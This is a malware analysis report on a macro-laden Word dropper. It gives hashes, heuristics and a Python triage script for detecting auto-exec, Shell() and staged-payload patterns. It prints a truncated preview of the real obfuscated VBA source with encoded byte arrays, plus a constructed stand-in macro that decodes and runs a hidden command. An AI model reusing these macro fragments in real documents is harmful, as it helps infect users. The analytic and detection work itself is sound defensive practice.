Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1e40948501072e74…

MALICIOUS

Office (OLE)

Size: 338.0 KB
Created: 2015-12-16 14:32:00 (OLE SummaryInformation metadata; attacker-controlled and often inherited from the template used to build the document, so the "first seen" date is the reliable one)
Authoring application: Microsoft Office Word
First seen: 2017-11-29
MD5: bb465157264e424bd01f555d08f7ec66
SHA-1: 92ce3b77dcf5f582f1c88b8e26556958c45f4ebc
SHA-256: 1e40948501072e741fd12db75e59a67d8e72f46e48ef41ebacb285acec681da8
Risk score: 262

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Microsoft Office Word document (OLE/CFB container) carrying VBA macros. A 'Document_Open' event handler is present, so the macro runs as soon as a recipient who has enabled macros opens the file (T1204.002), and it reaches a 'Shell()' call, which executes an arbitrary command line from the Word process (T1059.005). The extracted source shows the hallmarks of a generated dropper: junk subroutines made of no-op statements, a 'Declare' pointing at a library name that does not exist, 'On Error Resume Next' to swallow failures, and dozens of Variant arrays of byte values, consistent with a command line or second-stage payload that is decoded only at run time. This is the common dropper pattern in which the macro retrieves and executes a secondary payload; the password-protected-archive lure text and the ClamAV detection 'Doc.Dropper.Agent-6378595-0' support the assessment. Because the command is assembled at run time, the network indicator cannot be read from the static source alone; recovering it requires emulating the macro (for example with ViperMonkey) or detonating the sample in a sandbox.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6378595-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6378595-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    The document contains VBA macro code. Macros are not malicious by themselves; the related findings below are what make this set malicious.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro source calls Shell(), which launches an arbitrary command line from the Word process.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open event handler is present; Word runs it automatically when the document is opened with macros enabled, with no further user action.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. Because it does not depend on the visible source, this check also catches p-code-only documents (as produced by VBA stomping, where the source stream is removed or replaced) and documents where source extraction fails.
  • Password-protected archive handoff [high] SE_PASSWORD_ARCHIVE_LURE
    The document text gives password instructions for an archive or attachment, a lure often used to keep a payload encrypted until after gateway scanning.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. A URL is not a detection in itself; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. Every URL below was found in document text (OLE body), and all of them are XML namespace or schema identifiers (XMP, RDF, Dublin Core, Photoshop/TIFF/EXIF metadata, DrawingML) of the kind carried in embedded image metadata, plus the IEC reference string found in sRGB ICC profiles; none is a download location contacted by the macro.
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://ns.adobe.com/photoshop/1.0/
    • http://www.iec.ch
    • http://ns.adobe.com/tiff/1.0/
    • http://ns.adobe.com/exif/1.0/
    • http://schemas.openxmlformats.org/drawingml/2006/main
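
The source-level checks above (auto-exec entry point, Shell() token, decoy Declare, staged byte arrays) can be reproduced on any extracted module. The script below is an added example written for this page, not code from the analysis platform or from oletools. It assumes the macro source has already been extracted (for example with olevba from oletools), runs on a constructed VBA stand-in rather than the real 45 KB module, and its VBA_EX_ finding labels and the Xor 33 decode loop in the stand-in are this example's own inventions, not the platform's names or the sample's real decoding.

```python
"""Source-level triage of an extracted VBA module.

Added example for this page, not code from the analysis platform that
produced the report. It mirrors the spirit of the OLE_VBA_DOCOPEN,
OLE_VBA_SHELL and staged-payload checks over macro text that has already
been extracted (e.g. with `olevba` from oletools). SAMPLE_VBA is a
constructed stand-in; the VBA_EX_ labels are this example's own names.
"""
import math
import re
from collections import Counter

# Entry points Office runs automatically once the user enables macros (T1204.002).
AUTOEXEC = re.compile(
    r"\b(Document_Open|Document_Close|AutoOpen|AutoExec|AutoClose|Auto_Open|Workbook_Open)\b", re.I)
# Calls that execute a program, create an automation object, or fetch a file.
EXEC_TOKENS = re.compile(
    r"\b(Shell|CreateObject|GetObject|URLDownloadToFile|WinExec|ShellExecute\w*|CreateProcess\w*|XMLHTTP)\b", re.I)
# Declare ... Lib "name": a library that is not a known Windows DLL is a decoy or junk.
DECLARE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"', re.I)
KNOWN_LIBS = {"kernel32", "user32", "urlmon", "shell32", "advapi32",
              "ole32", "wininet", "ntdll", "gdi32", "oleaut32"}
# Array(n, n, ...) literals of small integers: the usual way to stage encoded payload bytes.
ARRAY_LITERAL = re.compile(r"Array\(\s*((?:\d{1,3}\s*,\s*)+\d{1,3})\s*\)", re.I)
MIN_ARRAY = 32  # shorter arrays are usually legitimate lookup tables


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: encrypted/compressed payloads sit near 8, plain text near 4-5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def harvest_arrays(src: str) -> list[bytes]:
    """Pull every long Array(...) literal whose elements all fit in a byte."""
    blobs = []
    for m in ARRAY_LITERAL.finditer(src):
        vals = [int(v) for v in re.split(r"\s*,\s*", m.group(1).strip())]
        if len(vals) >= MIN_ARRAY and max(vals) <= 255:
            blobs.append(bytes(vals))
    return blobs


def triage(src: str) -> dict:
    """Return the findings a reviewer wants before opening the sample anywhere."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(src)}, key=str.lower)
    exec_tokens = sorted({m.group(1) for m in EXEC_TOKENS.finditer(src)}, key=str.lower)
    bogus_libs = [(fn, lib) for fn, lib in DECLARE.findall(src)
                  if lib.lower().removesuffix(".dll") not in KNOWN_LIBS]
    blobs = harvest_arrays(src)
    findings = []
    if autoexec:
        findings.append("VBA_EX_AUTOEXEC")
    if any(t.lower() == "shell" for t in exec_tokens):
        findings.append("VBA_EX_SHELL")
    if bogus_libs:
        findings.append("VBA_EX_BOGUS_DECLARE")
    if blobs:
        findings.append("VBA_EX_STAGED_BYTES")
    # Auto-execution plus an execution primitive is the dropper signature;
    # either one alone is only suspicious.
    verdict = "malicious" if autoexec and exec_tokens else ("suspicious" if findings else "clean")
    return {
        "verdict": verdict,
        "findings": findings,
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        "bogus_libs": bogus_libs,
        "staged_bytes": sum(len(b) for b in blobs),
        "max_entropy": max((shannon_entropy(b) for b in blobs), default=0.0),
    }


# Constructed stand-in for an extracted module (not the real macro); the
# Xor 33 decode is illustrative only.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisDocument"
#If VBA7 Then
Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal a As String, b As Long) As Long
#End If
Dim A1() As Variant
Sub Document_Open()
    On Error Resume Next
    A1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95)
    Dim cmd As String, i As Integer
    For i = 0 To UBound(A1): cmd = cmd & Chr(A1(i) Xor 33): Next
    Shell cmd, vbHide
End Sub
'''

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

Pass the contents of the real macros.bas to triage() to run the same checks on it. The staged-byte count and entropy say whether the arrays are worth carving and trying keys against; an entry in bogus_libs is a Declare against a library that is not on the system, which fails at call time and therefore exists only as noise or a decoy.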

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45572 bytes
SHA-256: 074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long
#Else
Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long
#End If
Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer
Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant
Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant
Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant
Sub LHJwPn()
NrSyi8bt999vkR = 71
If Abs(6) = 57 Then OzAJDIA = 7498
Load QHW95ygCCXLKMlehi
DateSerial 52, 90, 50
DeleteSetting "Qp4Y8D4vz89Olb"
Randomize
DyCTQ9UKs03HGVdP = EOF(96)
If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80
DWcjwawOjsm = CVErr(31)
Hour 53
AppActivate 41
HDM9913zDtS = 60
End Sub
Function zKK(U6jMo As Integer) As Boolean
PdKLCGN = 61
Static HFBwwFtzVi0lGw38q As Byte
G7UUZ5FN3z = 78
HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1
OuWaqUF1z = 48
If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59)
AeIBD = 73
zKK = HFBwwFtzVi0lGw38q = 0
Q9dlGz5OfQm = 70
HFBwwFtzVi0lGw38q = 0
QPM3j8cFUa0L = 81
End Function
Sub OJwHPvvkNBx()
WBJkej = 47
On Error Resume Next
B0K8bUdQ = 54
A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237)
VpGcg5LX = 51
A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11
... (truncated)